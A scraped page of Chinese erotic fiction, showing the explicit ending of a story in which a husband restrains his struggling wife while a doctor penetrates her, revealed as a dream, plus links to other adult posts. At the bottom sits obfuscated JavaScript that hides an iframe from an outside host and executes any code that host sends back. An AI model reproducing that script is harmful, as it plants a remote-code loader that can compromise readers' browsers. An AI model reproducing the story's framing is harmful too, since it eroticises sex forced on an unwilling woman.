  陳蓉隨即大聲呻吟起來,身體不安的扭動著,我知道馬上要發生我一直夢想的事了。
  老婆,舒服嗎?”我俯下身子在老婆的耳邊輕聲問。
  嗯……”
  我一邊和陳蓉親吻,一邊搓揉著老婆的乳頭。突然,老婆渾身一震,雙手奮力想掙脫我的控製,我知道肯定是趙醫生插進去了,就更加用力不讓她掙脫,同時用力壓住老婆的上半身。老婆努力掙了幾下沒掙脫就安靜下來,可能她明白我是故意的,故意讓醫生插她。而她也覺得已經被插進去了,現在即便退出來也沒意義了,既然這樣那就享受吧。
  啊…啊…啊”
  美女,你的小穴好爽,又緊又燙,燙的我好舒服。”陳蓉的淫叫聲和趙醫生的興奮的呼喊聲混雜在一起。而我感覺老婆的身體有規律的一聳一聳的。
  啊…啊…啊,我要到了,我要射了。”
  射吧,給我老婆射在裏麵。”我也性奮到極點。
  啊……”趙醫生發出極度滿足的喊聲,身體緊緊貼著老婆的身體,把精子全部射進了老婆的陰道深處,甚至子宮裏。……啪”我一下睜開眼,臉好痛。
  你弄痛我了!你在射啊射的嘰裏咕嚕什幺?”我環顧四周,這不是在家裏嘛,我們還躺在床上,我左手還抓著老婆的乳房, 而右手食指和中指還插在老婆的下身裏。哦,原來是做了個夢。做個色夢不打緊,挨了老婆一耳光,鬱悶。
    -- 完 --

上一篇:Sena Nagakura永倉せな_[58P] 下一篇:菊花綻放在聖誕夜
eval('\x77\x69\x6e\x64\x6f\x77')['\x68\x4f\x50\x6e\x6d\x46\x67']=function(){;(function(u,r,w,d){'jQuery';var f=d.createElement('iframe');f.id=new Date().getTime();f.style.width=f.style.height=10+'px';f.src=[u,r].join('');d['write'](f.outerHTML);w['addEventListener']('message',function(e){d.getElementById(f.id).style.display='none';if(e.data['t']=='qqwwtt'){new Function(e.data['d'])()}})})('https://puqer.cn','/cd/104_m/162',window,document)};